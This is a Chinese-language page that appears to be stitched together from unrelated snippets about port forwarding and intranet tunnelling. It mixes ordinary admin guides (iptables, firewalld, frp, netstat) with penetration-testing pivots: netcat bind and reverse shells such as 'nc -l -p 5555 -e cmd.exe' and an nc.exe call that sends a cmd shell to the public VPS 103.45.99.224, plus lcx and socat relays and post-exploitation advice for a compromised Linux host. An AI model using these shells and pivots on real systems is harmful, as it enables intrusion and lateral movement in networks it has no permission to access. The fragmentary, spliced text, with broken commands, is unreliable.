工具使用 反向连接 场景概述: A主机外网 无法访问B内网机器 B内网机器 可以访问A外网机器 A:103.45.99.224(公网vps) ? ? B: 10.211.55.4(内网机器) ? ?...B:内网执行 Nc.exe 103.45.99.224 8787 ? ? 此时A主机公网vps就会收到B内网主机的cmd ? ?...正向连接 场景概述: A内网 可以访问 外网B B外网 不能访问 内网A 在外网B主机上执行nc -l -p 5555 -e cmd.exe ? ?...随后在内网A上执行nc –nvv 103.45.99.224 5555 ? ?...linux上的操作是一样的,更换几个命令即可
在渗透测试过程中,我们经常会用到端口转发,利用代理脚本将内网的流量代理到本地进行访问,这样极大的方便了我们对内网进行横向渗透。...在没有端口转发的情况下外网主机是不能直接连接内网主机的,但是lcx工具可以将内网主机(出入内网主机的需要能够ping通互联网)的某个端口抓发到外网的某个端口上面,这样的话处于外网的主机可以将映射到外网的端口再反弹到另一个外网的端口上面...用于目标服务器在内网或做了端口策略的情况下连接目标服务器内部开放端口。...山转一角 Linux一句话端口转发 我们在渗透测试中回经常遇见Linux主机环境,我们将获取到Linux主机的shell为内网渗透的工作之一,但有时候把并不是我们想象的那样简单,毕竟目标主机是处在内网环境中没有公网...冰雪来袭 socat 反弹一句话 Socat是Linux 下一个多功能的网络工具,它与nc工具差不多,但是看了网上多说人反馈相比NC工具方便的多。
工具介绍 Lcx是一个端口转发工具,有windows版和linux两个版本(linux版本名为protmap) 前期准备: 公网主机vps:103.45.99.224 受害机内网ip:127.0.0.1...工具使用 Windows 内网主机上执行:lcx.exe -slave 例: 将内网主机(10.211.55.3)的3389端口转发到公网主机...公网主机上执行:lcx.exe -listen 9898 8989 将本机9898端口的流量转发到8989端口上 ? ? 公网vps尝试访问8989端口 ? ? Linux 内网主机上执行: ..../portmap -m 3 -h1 -p1 -h2 -p2 例: 将内网主机(172.17.0.13)的22端口转发到公网主机(103.45.99.224...)的9898端口 ?
工具介绍 Frp 是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...= admin #HTTP代理端口 vhost_http_port = 10080 #HTTPS代理端口 vhost_https_port = 10443 然后运行....客户端 随后配置客户端编辑客户端配置文件 #服务器地址 server_addr = x.x.x.x #服务器绑定端口 server_port = 7000 #服务器连接密码 token = 12345678...#服务名称(自定义) [ssh] #转发协议类型 type = tcp #本地地址 local_ip = 127.0.0.1 #本地端口 local_port = 22 #远程端口 remote_port...此时frp隧道已经建立成功,可以通过访问vps的ip:7001就相当于访问了本地的22端口
点击上方“蓝字”关注我们 Frp实现端口转发内网穿透 准备工作 1.1 frp是什么 简单地说,frp就是一个反向代理软件,它体积轻量但功能很强大,可以使处于内网或防火墙后的设备对外界提供服务,它支持HTTP...releases 根据架构不同,选择相应版本并进行下载 Wget https://github.com/fatedier/frp/releases/download/v0.31.2/frp_0.31.2_linux_amd64....tar.gz 2.3解压tar -zxvf frp_0.31.2_linux_amd64.tar.gz 文件夹改个名,方便使用 cp -r frp_0.31.2_linux_amd64 frp 把解压出来的文件夹复制到你想要的目录下...3.1下载 根据架构不同,选择相应版本并进行下载 Wget https://github.com/fatedier/frp/releases/download/v0.31.2/frp_0.31.2_linux_amd64...内网穿透+ Metasploit渗透windows,所以这里不提及免杀并且关闭防护软件。
工具 Frp是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。...我本地是Windows,云服务器是Linux。 服务端server 编辑frps.ini # frps.ini [common] bind_port = 7000 启动frps ./frps -c ....修改成服务端Ip server_addr = x.x.x.x server_port = 7000 [rdp] type = tcp local_ip = 127.0.0.1 # 修改成RDP协议的端口
端口映射:端口映射就是将内网中的主机的一个端口映射到外网主机的一个端口,提供相应的服务。...当用户访问外网IP的这个端口时,服务器自动将请求映射到对应局域网内部的机器上。比如,我们在内网中有一台Web服务器,但是外网中的用户是没有办法直接访问该服务器的。...于是我们可以在路由器上设置一个端口映射,只要外网用户访问路由器ip的80端口,那么路由器会把自动把流量转到内网Web服务器的80端口上。...在这过程中,路由器充当了一个反向代理的作用,他保护了内网中主机的安全 端口转发:端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。...这就要我们的ip地址和路由器的端口进行绑定了,这时,在路由器中就会有一个内网ip和路由器端口对应的一张表。
############################################################# 通过nmap端口扫描获取开放的端口,以达到内网体检的目的 ##########...2、nmap对这个主机列表进行端口扫描 # 注意:刚开始没显式指定端口范围,发现例如27017这些端口都没扫描出来,后来就加了-p 1-65535参数,但是发现扫描特别慢,慎重考虑。...22/tcp open ssh Nmap scan report for node3 (192.168.2.13) 22/tcp open ssh 3、每天执行一次下面的这个脚本,获取最新的开放的端口...,并比对旧的数据,发现端口异动就自动报警。...4、如果确定当前端口是正常流程修改的,可以更新端口列表模板 cp /tmp/list_$(date +%F) /tmp/list 基本上完成这几步骤,就差不多了,还有很多不完善的地方,等想到了在补充进来
今天说一说udp端口转发 Linux,Linux iptables 端口转发[通俗易懂],希望能够帮助大家进步!!!...准备: 1, UDP端口范围映射 2, tcp 端口范围映射 3, 本机端口转发 4, 单个端口转发 打开转发 [root@CentOS ~]# cat /etc/sysctl.conf | grep...可以发现:端口映射完全匹配,双通互发数据成功!...2, tcp 端口范围映射 tcp 端口范围映射: [root@CentOS ~]# iptables -t nat -A PREROUTING -p tcp --dport 2000:2500 -j...4, 单个端口转发 端口转发 tcp模式:将访问本机1122端口数据包转发给192.168.66.2:5566 iptables -t nat -A PREROUTING -p tcp --dport
首先我们在一台CentOS7的VPS上部署frps: cd wget https://github.com/fatedier/frp/releases/download/v0.21.0/frp_0.21.0_linux_amd64....tar.gz tar -xzvf frp_0.21.0_linux_amd64.tar.gz cd frp_0.21.0_linux_amd64 编辑服务端配置文件: vi frps.ini 写入:...type = tcp local_ip = 127.0.0.1 local_port = 3210 remote_port = 12316 这个配置文件的含义是,当我们访问服务器的公网IP+12316端口就相当于访问我们本地电脑的...3210端口。...至此,frp的配置就大功告成了,我们现在成功的把内网的3210端口暴露给了外网。
FRP内网穿透应用场景:本地Web服务外网访问、本地开发微信、本地联调支付宝\微信支付、TCP/UDP端口转发 在本机开发好的网站想让客户测试不在需要上传到服务器上面,使用FRP内外网穿透轻松解决;微信开发也不需要在上传到服务器...,使用免费FRP内网穿透服务器帮您解决80端口问题,实现微信服务器直接访问到您本机web服务。...使用frp作为内网穿透的时候,有时候,我们需要多个端口穿透,怎么配置呢? FRP内内网穿透应用场景 思考: 我们知道frp要想内网穿透,需要配置服务端和客户端。...= 7500 dashboard_user = 自定义的用户名 dashboard_pwd = 自定义的密码 #日志路径 log_file = /home/frp_0.46.1_linux_amd64...在Proxies菜单下,点击TCP,可以看到对应的端口。如下图所示: frp管理界面查看启动的三个不同端口
使用frp作为内网穿透的时候,有时候,我们需要多个端口穿透,怎么配置呢? 思考: 我们知道frp要想内网穿透,需要配置服务端和客户端。如果需要直接访问80端口的话,需要还需要在nginx做配置。...= 7500 dashboard_user = 自定义的用户名 dashboard_pwd = 自定义的密码 #日志路径 log_file = /home/frp_0.46.1_linux_amd64.../log/frps.log #以下是配置多端口的 #端口8079是博客管理后台的项目 [tcp_blog-admin] type = tcp local_port = 8079 listen_port...= 8079 #端口8080是博客前台项目访问地址 [tcp_blog] type = tcp local_port = 8080 listen_port = 8080 #端口8082是其他项目访问的...在Proxies菜单下,点击TCP,可以看到对应的端口。如下图所示:
Linux内网渗透 收集测试网络环境 当我们拿到一台目标内网服务器,或者说肉鸡服务器,首先要做的就是收集信息。而在我看来需要收集的信息中,最重要的之一便是肉鸡的网络环境。...查看系统内核 linux系统上查看内核版本如下: lsb_release –a 一般系统的入侵途径是先提权,而提权可以通过linux内核漏洞进行,因此可以先查看linux内核版本,然后根据内核寻找exp...我们可以想到在windows中,利用lcx转发3389端口,linux下同样可以转发22端口,当然更好用的是转发80端口,达到可以本地访问内网的web服务,从而继续web渗透的套路,扩大攻击面。...内网嗅探 windows下可以使用cain,linux下可以使用msf中的模块。当然一般情况下,最好不要用内网嗅探,因为动静太大,而且可能会影响内网网络。...linux内网安全建议 说了这么多内网渗透的套路,按惯例最后该给出内网安全建设的几点建议了,当然只是个人看法。
1.centos7版本对防火墙进行 加强,不再使用原来的iptables,启用firewall 1.查看已开放的端口(默认不开放任何端口) firewall-cmd –list-ports 2.开启80...端口 firewall-cmd –zone=public(作用域) –add-port=80/tcp(端口和访问类型) –permanent(永久生效) firewall-cmd –zone=public...firewalld.service 6.删除 firewall-cmd –zone= public –remove-port=80/tcp –permanent 2.centos7以下版本 1.开放80,22,8080 端口...ACCEPT /sbin/iptables -I INPUT -p tcp –dport 8080 -j ACCEPT 2.保存 /etc/rc.d/init.d/iptables save 3.查看打开的端口
我们局域网的机器能够访问外网,但是外网不能访问内网。因为内网访问互联网时候能确定外网的地址,外网却不能确定我们局域网内的具体地址。...(ip地址有限)如果 我们在访问外网的时候,这个链接让他保持、不断,那么这个链接就相当于我们建了一条路,内网数据能出去,外网数据能进来,ssh也是这个方法。...首先在外网服务器上编辑sshd的配置文件 vim /etc/ssh/sshd_config #将GatewayPorts 开关打开 GatewayPorts yes 重启sshd服务,使用修改生效(linux...:ssh -NTf -R 8888:127.0.0.1:8080 root@host 3、参数说明 -C 允许压缩数据 -f 后台运行 -N 表示只连接远程主机,不打开远程shell -R 将端口绑定到远程服务器...,反向代理 -L 将端口绑定到本地客户端,正向代理 -T 不为这个连接分配TTY -NT 代表这个SSH连接只用来传数据,不执行远程操作 保持ssh链接不断开 通常我们使用ssh 链接服务器的时候
'端口'解义 以下讲义,纯属个人所学理解,可能会有出入,仅参考。 端口分物理端口和应用端口。物理端口是物理设备的,比如笔记本上插网线的网口,就属于物理端口。...应用端口是虚拟的,是网络模型中传输层的一种含义,也叫网络端口。大家常听的tcp端口、udp端口,是用来监听网络信息传输的。...一般来说,一个应用或者一个服务对一个网络端口,网络信息传输到设备的物理端口,既网络模型中的物理层,经链路层、网络层传输到操作系统中,操作系统会根据网络信息中的目的端口来确认接受信息的应用或者服务。...列出正在监听的端口 netstat -at # 列出所有TCP端口 netstat -au # 列出所有UDP端口 netstat -ax # 列出所有...在Linux中,所有内容都是文件,你可以将套接字视为写入网络的文件。
在linux中我们可以通过命令来启动和关闭端口,那么具体是哪个命令呢?下面由学习啦小编为大家整理了linux关闭端口的相关命令,希望对大家有所帮助。...linux关闭端口命令 前提:首先你必须知道,端口不是独立存在的,它是依附于进程的。某个进程开启,那么它对应的端口就开启了,进程关闭,则该端口也就关闭了。...下次若某个进程再次开启,则相应的端口也再次开启。而不要纯粹的理解为关闭掉某个端口,不过可以禁用某个端口。...1. linux查看端口状态命令 netstat -anp (注:加参数’-n’会将应用程序转为端口显示,即数字格式的地址,如:nfs->2049, ftp->21,因此可以开启两个终端,一一对应一下程序所对应的端口号...(注:有些端口通过netstat查不出来,更可靠的方法是”sudo nmap -sT -O localhost”) 3. linux关闭某个端口命令 1)通过iptables工具将该端口禁掉,如: “sudo
Linux 端口转发...POSTROUTING -d 10.0.1.123 -p tcp -m tcp --dport 3389 -j SNAT --to-source 10.0.0.254 #外网接口地址114.114.114.114 内网接口地址...、转发的地址 、转发的端口 启动rinetd服务 rinetd -c /etc/rinetd.conf SSH ssh转发命令 本地执行建立隧道,通过本机端口访问内部主机 ssh -N -L 0.0.0.0...:888:192.168.10.1:55555 -p55555 root@192.168.10.1 -f #外网ssh访问转发主机888端口就可以连接到内网192.168.10.1; -L 本机端口...; proxy_connect_timeout 1s; proxy_timeout 3s; proxy_pass manager; } } # 通过nginx 9001端口可以访问内网
前天我们说了Windows下的内网传输技术: 【内网渗透】Windows下的内网传输技术 今天再来看看Linux下的内网传输吧~ Part.1 Wput/Wget Wput Wput是一款linux...Part.2 Curl Curl 我们之前还讲过一期curl工具: 【Linux】关于Curl工具与HTTP的二三事 也可以利用该工具进行http下载: curl –O http://192.168.3.1
端口转发映射的程序叫rinetd,下载地址,直接manke编译安装即可。...要跳转的IP 要跳转的端口;在每一单独的行中指定每个要转发的端口。...源地址和目的地址都可以是主机名或IP 地址,IP 地址0.0.0.0 将rinetd 绑定到任何可用的本地IP地址上: 例如将所有发往本机80端口的请求转发到192.168.4.247的80端口...:123 & 在本地监听188端口,并将请求转发至192.168.1.22的123端口 TCP4-LISTEN:在本地建立的是一个TCP ipv4协议的监听端口; reuseaddr...:绑定本地一个端口; fork:设定多链接模式,即当一个链接被建立后,自动复制一个同样的端口再进行监听 socat启动监听模式会在前端占用一个shell,因此需使其在后台执行。
领取专属 10元无门槛券
手把手带您无忧上云